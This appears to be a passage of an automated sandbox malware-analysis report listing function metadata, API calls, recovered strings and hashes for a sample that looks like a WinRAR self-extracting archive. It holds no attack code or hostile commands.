                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Time$System$File$Format$DateLocalSpecific
                                        • String ID:
                                        • API String ID: 909090443-0
                                        • Opcode ID: c31a3e644db90368498d14f438a83ab0f0fc0250732d37c44035202579e618eb
                                        • Instruction ID: b5aa7d4cfa44f8017a355d99dfebacb505a5b27ccfa2a556cea7996b36ff081c
                                        • Opcode Fuzzy Hash: c31a3e644db90368498d14f438a83ab0f0fc0250732d37c44035202579e618eb
                                        • Instruction Fuzzy Hash: 0731FDB2510189AFDB11DFA4DD45EEF77ACFF59710F00412AF90AD6241EB74AA14CB60
                                        Function 00292F8D Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 350COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 002931A4
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: .lnk$0$lnk$S,
                                        • API String ID: 176396367-3971810066
                                        • Opcode ID: 72e7df791779e69f6e41efb3c1d0051d151b3e13880d9f3d45653be5f01b6f73
                                        • Instruction ID: f150c7f57d015c47b71ce9a041f7898803dc7260d93f2a937793c84b253655a7
                                        • Opcode Fuzzy Hash: 72e7df791779e69f6e41efb3c1d0051d151b3e13880d9f3d45653be5f01b6f73
                                        • Instruction Fuzzy Hash: 32E11871D212599FDF24DBA4CC85BDDB7B8BF08300F1044AAE409A7291DB349BA8CF64
                                        Function 0029977A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00299771,002996CC,00296A64), ref: 00299788
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00299796
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002997AF
                                        • SetLastError.KERNEL32(00000000,00299771,002996CC,00296A64), ref: 00299801
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 8bdcbd7900418b3ce0167e36facbee18913c96e8ca6612d68325d7bedb74385e
                                        • Instruction ID: a997bca44873ae2bcd753075456dee5d5e9c379c8d81d7ab09291bc7377ba840
                                        • Opcode Fuzzy Hash: 8bdcbd7900418b3ce0167e36facbee18913c96e8ca6612d68325d7bedb74385e
                                        • Instruction Fuzzy Hash: 6F01D4B21393129EAE242FBD7CE95AAA7C4EB02375731033DF620550E0EF514CA0E581
                                        Function 002A0005 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0029B581,?,002BE088,?,0029AE80,?,002BE088,?,00000007), ref: 002A0009
                                        • _free.LIBCMT ref: 002A003C
                                        • _free.LIBCMT ref: 002A0064
                                        • SetLastError.KERNEL32(00000000,002BE088,?,00000007), ref: 002A0071
                                        • SetLastError.KERNEL32(00000000,002BE088,?,00000007), ref: 002A007D
                                        • _abort.LIBCMT ref: 002A0083
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: b51219b36a2b9a061713cc8f3278c9e73dfe66b2c590fef7def0863ee25984fb
                                        • Instruction ID: fa928b74e0c822d5a7f17ac510398db998c4a9c16091e48503e3025653a304a4
                                        • Opcode Fuzzy Hash: b51219b36a2b9a061713cc8f3278c9e73dfe66b2c590fef7def0863ee25984fb
                                        • Instruction Fuzzy Hash: 4CF0C836134A01E7C62237347D8EF2B2A559FC3771F360114F618D21D2EE759C729A24
                                        Function 00293FCF Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00293FDB
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00293FF5
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00294006
                                        • TranslateMessage.USER32(?), ref: 00294010
                                        • DispatchMessageW.USER32(?), ref: 0029401A
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00294025
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        • Opcode ID: 9dbb6b3fa064e25a841948a5ec4731b04b3cfb615665c43977b44bdde0b43eb8
                                        • Instruction ID: 80d03ed0e5cad2d88457964fdc1d6eca0a3f5853a1171e4013f38cf29c294873
                                        • Opcode Fuzzy Hash: 9dbb6b3fa064e25a841948a5ec4731b04b3cfb615665c43977b44bdde0b43eb8
                                        • Instruction Fuzzy Hash: 2FF04F72A0111ABBCF206FA1EC4CEDF7F6DEF42391B008011FA06E2050E6349552CBE0
                                        Function 0028EF21 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0028EBAA: GetDC.USER32(00000000), ref: 0028EBAE
                                          • Part of subcall function 0028EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0028EBB9
                                          • Part of subcall function 0028EBAA: ReleaseDC.USER32(00000000,00000000), ref: 0028EBC4
                                        • GetObjectW.GDI32(?,00000018,?), ref: 0028EF65
                                          • Part of subcall function 0028F1EC: GetDC.USER32(00000000), ref: 0028F1F5
                                          • Part of subcall function 0028F1EC: GetObjectW.GDI32(?,00000018,?), ref: 0028F224
                                          • Part of subcall function 0028F1EC: ReleaseDC.USER32(00000000,?), ref: 0028F2BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: ($Pl)uDK)$kJ)
                                        • API String ID: 1061551593-3192220080
                                        • Opcode ID: de2e15a0fd40e8ab530295fc4a60e0221d97e526515aaa77e499fe8aadfe14a1
                                        • Instruction ID: a6c3ed54b5dae4cf595379c6833a93f1da25300da10f738482a5165081af6394
                                        • Opcode Fuzzy Hash: de2e15a0fd40e8ab530295fc4a60e0221d97e526515aaa77e499fe8aadfe14a1
                                        • Instruction Fuzzy Hash: E79102756183159FC750DF65D848A6BBBE9FF89B00F10491EF98AD3260CB70A905CF62
                                        Function 00292493 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 216windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000066), ref: 002926A9
                                        • SendMessageW.USER32(00000000,00000143,00000000,002C5380), ref: 002926D6
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00292702
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 002925F4
                                        • ProgramFilesDir, xrefs: 002925E0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item
                                        • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 3888421826-2634093826
                                        • Opcode ID: 9e5b72743888b74262d74deb6aa15d81b64daa843ff1fb801d2165df487f4d61
                                        • Instruction ID: 853bab2282c9ec78deaa075c55a9c1716ac2cfc898e1917472a87f6d9e8a2b3c
                                        • Opcode Fuzzy Hash: 9e5b72743888b74262d74deb6aa15d81b64daa843ff1fb801d2165df487f4d61
                                        • Instruction Fuzzy Hash: EC815E31920259EEDF24EBE4C891FEDB778AF18310F545099E509B7181DB706BA9CF60
                                        Function 0027A300 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 136COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027A307
                                        • GetLastError.KERNEL32(00000054,?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027A427
                                          • Part of subcall function 0027AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0027AC2E
                                          • Part of subcall function 0027AC11: GetLastError.KERNEL32 ref: 0027AC72
                                          • Part of subcall function 0027AC11: CloseHandle.KERNEL32(?), ref: 0027AC81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege$K)
                                        • API String ID: 2235100918-3651858649
                                        • Opcode ID: 0d5af36fbf85f95e5ea72de2443f76396ec64754b632b8dc6756b93b2c3aa548
                                        • Instruction ID: da97e31bb07610b8db17fd7de4287a20c5fb544db44e04d661a4ca2f5a1c232e
                                        • Opcode Fuzzy Hash: 0d5af36fbf85f95e5ea72de2443f76396ec64754b632b8dc6756b93b2c3aa548
                                        • Instruction Fuzzy Hash: 69417370E20219ABDF14EFE8E899BEDB7B8AF48314F04801EF505B7241DB7599548F25
                                        Function 0028DC95 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen$H_prolog3
                                        • String ID: &nbsp;$<br>
                                        • API String ID: 1035939448-26742755
                                        • Opcode ID: d4606c007d23917a0fcbebbc7c413d2ef81441c9553c53928d21a1b24de85e57
                                        • Instruction ID: 81dff6ed67796ebbc1b5b0566b6c659514e09a13ccc2c2c8a508a9aae6bcdcb7
                                        • Opcode Fuzzy Hash: d4606c007d23917a0fcbebbc7c413d2ef81441c9553c53928d21a1b24de85e57
                                        • Instruction Fuzzy Hash: 8A416F3AB612119BDB15AF54C881B3D7336FF95704F60842AE4068F2C1EBB19DA6CBD1
                                        Function 002901DD Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 112COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_wcslen
                                        • String ID: BL)$VL)$`L)
                                        • API String ID: 3746244732-3221003899
                                        • Opcode ID: 5df4bbf87d17d03148c0f15822b83d3f044657af83b87ee621c4012f7a595daa
                                        • Instruction ID: f52ca1effff2c2c4c8b1871ade406186740eb870ca92b78247d36e5dde793609
                                        • Opcode Fuzzy Hash: 5df4bbf87d17d03148c0f15822b83d3f044657af83b87ee621c4012f7a595daa
                                        • Instruction Fuzzy Hash: E2410871A2110AAFDF04DFA8DD899EE77B9FF09314B104119F855AB2A1DB309E20CB64
                                        Function 0028FA79 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0028FEA7: GetCurrentProcess.KERNEL32(00020008,?), ref: 0028FEB6
                                          • Part of subcall function 0028FEA7: GetLastError.KERNEL32 ref: 0028FEE1
                                        • CreateDirectoryW.KERNEL32(?,?), ref: 0028FB23
                                        • LocalFree.KERNEL32(?), ref: 0028FB31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                        • String ID: .L)$8L)$tL)
                                        • API String ID: 1077098981-630498960
                                        • Opcode ID: 4956e262f5eaf1394471d0813c4d4378d8721dabded32cabdd2063d7234ef5e6
                                        • Instruction ID: f5172845ff8987174576782d22597b75bc3ff4cfdfd4780eb52e59ec11179bd2
                                        • Opcode Fuzzy Hash: 4956e262f5eaf1394471d0813c4d4378d8721dabded32cabdd2063d7234ef5e6
                                        • Instruction Fuzzy Hash: 6921E6B590120A9BDF10DFA5E9889EEBBF8FF48314F10452AE815E3150D7349A15CBA0
                                        Function 00293D64 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID: BL)$LL)$Software\WinRAR SFX$jL)
                                        • API String ID: 2427045233-653404485
                                        • Opcode ID: 1819d2be661f9ebd17f0a7fa0c0e76cd1b3002a512befd8413a7cc556d2f9240
                                        • Instruction ID: 58d42b6fd13733af99525461b9d63cbc92ace688d17316417081c4b071c24ab0
                                        • Opcode Fuzzy Hash: 1819d2be661f9ebd17f0a7fa0c0e76cd1b3002a512befd8413a7cc556d2f9240
                                        • Instruction Fuzzy Hash: 1D214D71920219EBDF20DFA5EC89EEEBBB9FF88710F10441AF541A2150D7709A94CB60
                                        Function 00293EFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00293F03
                                        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00293F1B
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00293F86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable$H_prolog3_
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 3605364767-3493335439
                                        • Opcode ID: 329c241512ab7f7732ec5842938e4e756a56fe4fe5fa8810f6561adafd168c80
                                        • Instruction ID: 94cedf22fbe737a730001045c38793817e4b040a704dfd5f71d89c8d3427e7e4
                                        • Opcode Fuzzy Hash: 329c241512ab7f7732ec5842938e4e756a56fe4fe5fa8810f6561adafd168c80
                                        • Instruction Fuzzy Hash: 33212570E21218DFCF14DFA8E9889EDB7F9EF09300B10442AF446A7640DB30AA65CF65
                                        Function 0029ED2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0029ECE0,00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002), ref: 0029ED4F
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0029ED62
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0029ECE0,00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002), ref: 0029ED85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 078f0ae4d16bf10f4b8bab1ac5e09b37d2ba5270f311e779ec3defac7591985c
                                        • Instruction ID: 4f54c6ae2a288691594ba71b88bc6968cf40622e88838b6b46a7bdbcbe2e3e20
                                        • Opcode Fuzzy Hash: 078f0ae4d16bf10f4b8bab1ac5e09b37d2ba5270f311e779ec3defac7591985c
                                        • Instruction Fuzzy Hash: 74F03C70A20219FBCF159FA4EC09BAEBFB9EB09725F110168E805A2250CF354A90CB90
                                        Function 0029631E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • SleepConditionVariableCS.KERNELBASE(?,002962BB,00000064), ref: 00296341
                                        • LeaveCriticalSection.KERNEL32(002C60E0,?,?,002962BB,00000064,?,?,?,?,00000000,002AA75D,000000FF), ref: 0029634B
                                        • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,002962BB,00000064,?,?,?,?,00000000,002AA75D,000000FF), ref: 0029635C
                                        • EnterCriticalSection.KERNEL32(002C60E0,?,002962BB,00000064,?,?,?,?,00000000,002AA75D,000000FF), ref: 00296363
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                        • String ID: `,
                                        • API String ID: 3269011525-3004470232
                                        • Opcode ID: 7e96ceb69f04e12a0baf9517aaf4daf73e52878ce89a98a183bd025f756088e4
                                        • Instruction ID: 46258e40043828622efb823900a1380cafd6bf6e4ef4d307be537b195fd2f1f5
                                        • Opcode Fuzzy Hash: 7e96ceb69f04e12a0baf9517aaf4daf73e52878ce89a98a183bd025f756088e4
                                        • Instruction Fuzzy Hash: 3AE04831661234FFCB111F90FC0DF9D7F68FB06B91B154155F90AB6160CB6259209BD9
                                        Function 00285094 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00286C5E: __EH_prolog3_GS.LIBCMT ref: 00286C65
                                          • Part of subcall function 00286C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00286C9A
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002850B3
                                        • GetProcAddress.KERNEL32(002C51F8,CryptUnprotectMemory), ref: 002850C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryH_prolog3_System
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 270589589-1753850145
                                        • Opcode ID: f236efca2b80c38e3d61f671288f7c66a46484334425ce1e35e7fa91e5721f50
                                        • Instruction ID: 9bf38c890ba58e165a612127b41a27eb4a334f3cbe9119fa61f9a9419266fc62
                                        • Opcode Fuzzy Hash: f236efca2b80c38e3d61f671288f7c66a46484334425ce1e35e7fa91e5721f50
                                        • Instruction Fuzzy Hash: 12E04F74821B12DFD7306F74EC0D7467ED46F1B704F20882EA4D993580DEB5E4608B50
                                        Function 0029985A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
